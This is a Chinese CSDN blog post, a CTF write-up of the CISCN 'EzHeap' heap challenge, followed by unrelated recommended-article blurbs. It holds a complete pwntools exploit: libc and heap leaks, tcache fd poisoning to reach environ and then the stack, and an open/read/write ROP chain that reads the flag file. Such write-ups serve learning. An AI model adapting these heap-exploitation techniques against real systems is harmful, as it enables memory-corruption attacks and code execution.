CISCN --EzHeap

最新推荐文章于 2024-07-10 17:35:49 发布
最新推荐文章于 2024-07-10 17:35:49 发布
阅读量242 收藏 3
点赞数 4
文章标签: 服务器 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A13837377363/article/details/139264795
版权

当时有点着急了,这题没写出来,结束后在ctfshow上做了一下。

使用的方法是environ泄露栈地址,然后在栈上构造orw的rop链。

以下是过程:

只能orw。

堆体开沙盒模式会在heap和bin一开始构造很多垃圾堆。所以分配和free的时候要注意原本heap和bin中的情况 。

我观察了一下,在malloc_cosolidate后,最大的free_chunk是0x1a0,所以我采用0x200的chunk,这样就不会被影响。

不能uaf 

edit可以自定义大小 。

思路清晰了,将下一个0x420大小的chunk给free掉,这样fd段就是usbin地址,然后用edit将当前chunk和下一个chunk的size段和pre_size填满,然后show(),就能全都打印出来,就能泄露libc基址了。同时如果下一个chunk是tcachebin,也能用edit修改它的fd,或者泄露堆地址。

所以,整体就是:泄露libc基址--->计算出environ地址-->泄露堆地址--->覆盖fd-->分配到environ-0x200的位置-->泄露栈地址-->覆盖fd-->分配到栈上-->写入rop链

以下是exp:

from pwn import *
context.arch='amd64'
elf=ELF('./EzHeap')
libc=ELF('./libc.so.6')
#io=remote('node5.buuoj.cn',27949)
io=process('./EzHeap')
#io=remote('61.147.171.105',54043)
io=remote('pwn.challenge.ctf.show',28124)

def add(size,content):
    io.recvuntil(b"choice >> ")
    io.sendline(b'1')
    io.recvuntil(b"size:")
    io.sendline(str(size).encode())
    io.recvuntil(b"content:")
    io.send(content)

def delete(idx):
    io.recvuntil(b"choice >> ")
    io.sendline(b'2')
    io.recvuntil(b"idx:\n")
    io.sendline(str(idx).encode())

def show(idx):
    io.recvuntil(b"choice >> ")
    io.sendline(b'4')
    io.recvuntil(b"idx:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"content:")

def edit(idx,size,content) :
    io.recvuntil(b"choice >> ")
    io.sendline(b'3')
    io.recvuntil(b"idx:")
    io.sendline(str(idx).encode())
    io.recvuntil(b"size:")
    io.sendline(str(size).encode())
    io.recvuntil(b"content:")
    io.send(content)


for i in range(8):
    add(0xe0,b'aa')
#gdb.attach(io)
#pause()
add(0x200,b'a')#8
add(0x410,b'a')#9
add(0x200,b'a')#10
#gdb.attach(io)
#pause()
delete(9)
edit(8,0x210,b'a'*0x20f+b'b')
show(8)
io.recvuntil(b'b')
libc_base=u64(io.recv(6).ljust(8,b'\x00'))-0x21ace0
print('libc_base:',hex(libc_base))
#gdb.attach(io)
#pause()
environ=libc_base+libc.sym['environ']
print('environ:',hex(environ))
edit(8,0x210,b'a'*0x200+p64(0)+p64(0x421))
add(0x410,b'a')#9
add(0x200,b'a')#11
add(0x200,b'a')#12
delete(12)
#gdb.attach(io)
#pause()
#leak heap addr
edit(11,0x210,b'a'*0x20f+b'b')
show(11)
io.recvuntil(b'b')
hee=u64(io.recv(5).ljust(8,b'\x00'))
heap_base=hee*0x1000
print('heap_base:',hex(heap_base))
#gdb.attach(io)
#pause()
my_addr=heap_base+0xd50
edit(11,0x210,b'a'*0x200+p64(0)+p64(0x211))
delete(11)
fake_fd=(heap_base>>12)^(environ-0x200)
edit(10,0x218,b'a'*0x200+p64(0)+p64(0x211)+p64(fake_fd))
add(0x200,b'a')#11
add(0x200,b'a'*0x1ff+b'b')#12
show(12)
io.recvuntil(b'b')
stack=u64(io.recv(6).ljust(8,b'\x00'))
print('stack:',hex(stack))
#gdb.attach(io)
#pause()
ret_addr=stack-0x170
print('ret_addr:',hex(ret_addr))
ret=libc_base+0x29139 
rax=libc_base+0x45eb0
rdi=libc_base+0x2a3e5
rsi=libc_base+0x2be51
rdx_rbx=libc_base+0x11f2e7
syscall=libc_base+0x91316
#gdb.attach(io)
#pause()
add(0x200,b'a')#13
add(0x200,b'a')#14
add(0x200,b'a')#15
delete(15)
delete(14)
heap_base+=0x1000
fake_fd=(heap_base>>12)^(ret_addr-0x8)
edit(13,0x218,b'a'*0x200+p64(0)+p64(0x211)+p64(fake_fd))
#gdb.attach(io)
#pause()
add(0x200,b'a')
#gdb.attach(io)
#pause()
payload=p64(0)+p64(rax)+p64(2)+p64(rdi)+p64(ret_addr+0xd8)+p64(rsi)+p64(0)+p64(syscall)+p64(rax)+p64(0)+p64(rdi)
payload+=p64(3)+p64(rsi)+p64(ret_addr+0x100)+p64(rdx_rbx)+p64(0x100)+p64(0)+p64(syscall)
payload+=p64(rax)+p64(1)+p64(rdi)+p64(1)+p64(rsi)+p64(ret_addr+0x100)+p64(rdx_rbx)+p64(0x100)+p64(0)+p64(syscall)+b'/ctfshow_flag\x00'
add(0x200,payload)
io.interactive()

奇怪的轩轩
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
思科--ACL
Clown_Tao的博客
09-05 2249
这些全部是我自己总结和结论,感觉我提供的知识点不错的,可以给我点个关注!也可以进行私聊讨论。 这个ACL整理我不容易点个赞赞被嘻嘻! 1.创建标椎的ACL配置方法 命令: access-list access-list-number {permit、deny} source 【source-wildcard】 access-list-number:ACL表号,对于标准CAL来说,改表号是1-99中的一个数字。 permit、deny:如果满足测试条件,则允许、拒绝该同行...
CISCO ROUTE-MAP
vx XIxi_AL
09-16 2879
强制指定源地址的下一跳 match定义匹配条件 match ip address匹配访问列表或前缀列表 match interface匹配下一跳出接口为指定接口之一的路由 match ip next-hop匹配下一跳地址为特定访问列表中被允许的那些路由 match metric匹配具有指定度量值的路由 match route-type匹配指定类型的路由 match tag根据路由的标记进行匹配 set定义动作 set metric设置路由协议的度量值 set metric-type设
2024 cicsn Ezheap
llovewuzhengzi的博客
06-01 779
0x80个chunk,遍历选一个没有被用的,输入的size<0x501,然后malloc后会清零安装输入的size,然后输入内容,长度也是输入的size。指定索引,并判断是否存在,然后输入size<0x501,再往索引对应的chunk输入size长度内容,这里存在越界读。堆题开启沙盒会出现一堆被malloc和free的堆,要着重过滤下。指定索引,并判断是否存在,然后输出索引的chunk内容。指定索引,并判断是否存在,然后free和清零。
XCIE-HUAWEI-Cisco-思科-华为-华三堆叠(理论+实操)
weixin_48137911的博客
08-19 5425
2.因为传统网络是需要用生成树来阻塞某个口的,那如果少了一个口,那么就相当于少了一个口的性能,相当于1+12,为什么是等于大于2呢,因为堆叠的性能肯定是比单机高的.STP带宽使用率起不来,我接根线,尼玛他是断的.但是堆叠可以完全用上。
cisco-静态路由配置
qq_69814495的博客
03-21 1493
其中,下面代码是为了设置了一条静态路由,以指定到达目的网络 192.168.10.0/24 的 ling1 设备 se2/0 接口的地址,即10.10.10.1。其中,下面代码是为了设置了一条静态路由,以指定到达目的网络 192.168.20.0/24 的下一跳地址即10.10.10.2.3.路由器router0(即左边路由器)的配置代码。
Cisco-DNA.pdf
09-29
【思科DNA技术详解】 思科DNA(Digital Network Architecture,数字化网络架构)是思科推出的一种先进的网络设计理念,旨在提供更稳定、敏捷的网络服务,同时加强网络安全和自动化能力。以下将详细介绍思科DNA的...
Cisco-PEAP-Win7-Vista
09-17
Cisco-PEAP-Win7-VistaCisco-PEAP-Win7-VistaCisco-PEAP-Win7-VistaCisco-PEAP-Win7-VistaCisco-PEAP-Win7-VistaCisco-PEAP-Win7-Vista
Cisco-as5300设备的配置
11-23
Cisco-as5300 VOIP-GW设备的配置方法,对于有VOIP和电话交换机互连的需求的可以,查看一下。
cisco-vss-思科技术学习,相关介绍
07-05
cisco-vss 技术大概介绍,可以试着了解一下子,技多不压身
cisco-files
08-06
标题 "cisco-files" 暗示我们正在讨论与思科(Cisco)相关的文件,而描述中的 "bin file for cisco" 提到了一个特定类型的二进制文件,这通常是网络设备固件或软件更新的形式。在IT领域,尤其是网络管理中,Cisco的...
【qt】TCP的监听 (设置服务器IP地址和端口号)
qq_74047911的博客
07-07 225
当一个TCP服务器程序启动时,它会绑定到一个特定的IP地址和一个端口号上,以便可以接收来自该IP地址和端口号的传入连接请求.我们是从下拉框选的,都是QString类型,我们要进行转换.端口号可以自己设置,范围在0~65535也就是两个字节.但是0~1024一般不可以设置,操作系统用了已经.所以我们要先来获取主机的IP地址和设置端口号.TCP监听是在自己的IP地址上进行的。(),参数是ip地址和端口号.()来获取服务器的ip地址。()来获取服务器的地址.协议,我们需要使用到。获取到主机的IP地址。
服务器提交记录有Merge branch消除
最新发布
绿色落日的博客
07-10 83
背景:在共同开发分支release上,你提交了commit,push到服务器上时,发现有人先比你push了,所以你得先pull, 后再push,然而pull后自动产生了一个Merge branch的一个commit,这个commit本身没有任何提交内容,而你直接push到服务器上了,于是服务 器产生了这样的commit log,想要消除服务器上的这条Merge commit,那么可以尝试下面的方法。可以rebase到以前的commit id上,然后:wq保存后,就会消除,再强制提交到服务器覆盖掉。
转发服务器实验
qq_65017742的博客
07-06 424
【代码】转发服务器实验。
Linux】进程的基本概念(以及进程地址空间的初步了解)
EWIAW_ilove的博客
07-10 576
根据书本上的概念来解释,一个运行起来被加载到内存中)的程序称为进程。光这样一句话很难体会到什么是进程,所以我们来展开讲一下。上面的问题,我们先放一放,我们来解释一下什么是地址空间。在学习C/C++的时候,应该都见过这个图,为什么这个图叫做C/C++的内存分布,而不是内存条的内存分布?那既然有C/C++的内存分布,那是不是说明还有其他语言的内存分布,为什么同一块内存条上,不同的语言会有不同的内存分布呢?那是因为这个C/C++内存分布其实是虚拟地址,这个内存分布的地址不是真实的,这个虚拟地址就叫做。
堆叠的作用
陪我养猪吧的博客
07-05 985
传统的园区网络采用设备和链路冗余来保证高可靠性,但其链路利用率低、网络维护成本高,堆叠技术将多台交换机虚拟成一台交换机,达到简化网络部署和降低网络维护工作量的目的。
服务器本地部署文件服务器minio
salonzhou的专栏
07-07 200
服务器上的/root/minio/data/下也加了一个his文件夹,在这个文件夹下放入文件,在监控台上就可以看到内容。minio类似于阿里云的OSS,为不方便把图、文、日志等形式的文件保存在公有云上的,可以在自己的服务器上部署文件服务器。在buckets中添加一个新bucket,再把对外访问权限由私有改为public,假如新bucket的名称为his。看过本人前几个文章的,使用docker就会很快上手部署,直接上所有代码。直接访问:******ip:9001/dashboard。
Linux】进程优先级 + 环境变量
weixin_42976474的博客
07-07 637
在了解进程状态之后,本章我们将来学习一下进程优先级,还有环境变量等。。
插8张显卡的服务器有哪些?
qq_34245974的博客
07-09 932
Fujitsu PRIMERGY CX2550 M4 是一款高密度的GPU服务器,可以支持多达8张NVIDIA或AMD的GPU卡。总之,随着GPU技术的发展,越来越多的服务器开始支持插入多张显卡,以满足不断增长的高性能计算需求。HP ProLiant DL380 Gen10 是一款多功能的服务器,可以配置多达8张NVIDIA或AMD的GPU卡。本文将介绍几款能够支持插入8张显卡的服务器。Dell PowerEdge C4140 是一款高密度的GPU服务器,可以支持多达8张全高双宽的GPU卡。
cisco-sccp
07-31
回答: cisco-sccp是指Cisco IP Phone 7960/7940使用的Skinny Call Control Protocol (SCCP)。SCCP是一种用于与Cisco CallManager配合使用的协议,它允许IP电话与CallManager进行通信和控制。IP电话可以通过更改固件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值